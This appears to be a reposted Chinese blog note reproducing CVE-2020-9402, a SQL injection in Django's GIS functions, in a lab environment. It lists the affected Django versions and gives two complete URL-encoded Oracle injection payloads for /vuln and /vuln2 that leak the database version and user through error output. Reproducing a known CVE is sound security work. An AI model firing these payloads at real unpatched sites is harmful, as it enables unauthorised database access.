微信公众号搜"智元新知"关注
微信扫一扫可直接关注哦!

Django GIS SQL注入漏洞复现CVE-2020-9402

漏洞概述:
Django是Django基金会的一套基于Python语言的开源Web应用框架。该框架包括面向对象的映射器、视图系统、模板系统等。 Django 1.11.29之前的1.11.x版本、2.2.11之前的2.2.x版本和3.0.4之前的3.0.x版本中存在sql注入漏洞。攻击者可借助特制的sql语句利用该漏洞查看、添加修改删除数据库中的信息。
复现流程:
一个注入漏洞在/vuln目录下,直接访问该目录是无任何回显的。此时直接对q传参即可。payload如下:
http://your-ip:8000/vuln/?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1

第二处漏洞在/vuln2目录下,payload如下:

http://your-ip:8000/vuln2/?q=0.05)))%20FROM%20%22VULN_COLLECTION2%22%20%20where%20%20(select%20utl_inaddr.get_host_name((SELECT%20user%20FROM%20DUAL))%20from%20dual)%20is%20not%20null%20%20--
执行成功后会有相关sql语句回显信息。

版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。

相关推荐